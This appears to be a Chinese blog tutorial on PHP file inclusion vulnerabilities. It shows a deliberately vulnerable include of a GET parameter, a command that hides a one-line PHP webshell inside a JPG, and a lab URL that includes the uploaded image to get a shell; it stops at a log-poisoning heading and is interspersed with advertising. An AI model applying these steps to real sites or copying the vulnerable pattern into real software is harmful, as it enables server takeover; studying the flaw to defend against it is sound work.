0x00 何为文件包含漏洞

开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子:

<? include $_GET['a'] ?>

此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

一个更具体的例子:

在访问一个页面时:
php文件包含漏洞 file inclusion vulnerability Safe 第1张

此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为文件包含成功。

0x01 结合文件上传getshell

  1. 制作嵌有一句话木马的jpg文件:
copy a.jpg/b+b.php c.jpg

php文件包含漏洞 file inclusion vulnerability Safe 第2张

记事本打开图片:
php文件包含漏洞 file inclusion vulnerability Safe 第3张

发现php代码已被嵌入,此时上传文件,然后进行文件包含:
http://192.168.125.131/cs/main.php?page=uploads/c.jpg

最后成功getshell

0x02 利用日志解析

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄